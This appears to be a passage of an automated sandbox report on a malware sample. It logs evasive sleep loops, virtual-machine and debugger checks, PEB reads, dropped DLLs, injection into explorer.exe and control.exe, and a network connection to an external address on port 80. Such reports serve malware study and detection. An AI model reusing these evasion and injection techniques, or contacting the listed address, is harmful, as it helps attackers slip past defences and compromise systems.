Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -1773297476s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 1682 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 2348 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 818 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -157056s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 698 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -268032s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 853 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -81888s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 446 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 2353 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -56472s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 784 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440	Thread sleep count: 3777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452	Thread sleep count: 161 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep count: 2449 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep count: 84 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4104	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4972	Thread sleep count: 5209 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4964	Thread sleep count: 1051 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552	Thread sleep time: -922337203685477s >= -30000s

Found evasive API chain (date check)

Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pqvogmwc.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0hsihch1.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sjfy431f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oeprcmty.dll	Jump to dropped file

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 1682	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 2348	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 818	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 698	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 853	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 446	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 2353	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 784	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 386	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 467	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 878	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2449
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5209
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1051

Found evasive API chain checking for process token information

Source: C:\Windows\SysWOW64\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\rundll32.exe

API coverage: 5.7 %

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_046CB190
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_046CB2F7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_046DD39D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04BCB190
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_04BCB2F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_04BDD39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	4_2_05EAB190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	4_2_05EBD39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	4_2_05EAB2F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	5_2_0511B190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	5_2_0512D39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	5_2_0511B2F7

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\loaddll32.exe

1_2_046DFD82

Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000002F.00000000.496756398.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000002F.00000000.504963092.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: rundll32.exe, 00000005.00000003.356861693.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.495341507.000000000337C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.370066719.0000000003382000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.494533475.000000000337C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.496800604.000000000337F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359830510.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWntVersion\Internet Settings~~
Source: explorer.exe, 0000002F.00000000.504963092.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: loaddll32.exe, 00000001.00000003.492686676.0000000001342000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.508275635.0000000001347000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.370406857.0000000001332000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.493122796.0000000001310000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.511408070.0000000001343000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.489086905.000000000133A000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.488421383.0000000001331000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.493342130.0000000001346000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(^8
Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_046D653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_046D653E

Contains functionality to read the PEB

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0CE8 mov eax, dword ptr fs:[00000030h]	1_2_00DC0CE8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0C57 mov eax, dword ptr fs:[00000030h]	1_2_00DC0C57
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0A64 mov eax, dword ptr fs:[00000030h]	1_2_00DC0A64
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0BFC mov eax, dword ptr fs:[00000030h]	1_2_00DC0BFC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0B14 mov eax, dword ptr fs:[00000030h]	1_2_00DC0B14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120C57 mov eax, dword ptr fs:[00000030h]	4_2_01120C57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120B14 mov eax, dword ptr fs:[00000030h]	4_2_01120B14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120BFC mov eax, dword ptr fs:[00000030h]	4_2_01120BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120A64 mov eax, dword ptr fs:[00000030h]	4_2_01120A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120CE8 mov eax, dword ptr fs:[00000030h]	4_2_01120CE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0CE8 mov eax, dword ptr fs:[00000030h]	5_2_00EB0CE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0A64 mov eax, dword ptr fs:[00000030h]	5_2_00EB0A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0C57 mov eax, dword ptr fs:[00000030h]	5_2_00EB0C57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0BFC mov eax, dword ptr fs:[00000030h]	5_2_00EB0BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0B14 mov eax, dword ptr fs:[00000030h]	5_2_00EB0B14

Checks if the current process is being debugged

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	1_2_046C8C50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	3_2_04BC8C50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	4_2_05EA8C50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05118C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	5_2_05118C50

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 194.76.226.200 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Writes to foreign memory regions

